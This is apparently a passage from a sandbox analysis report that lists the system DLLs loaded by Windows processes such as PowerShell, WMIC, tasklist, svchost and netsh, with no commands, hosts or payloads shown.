              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
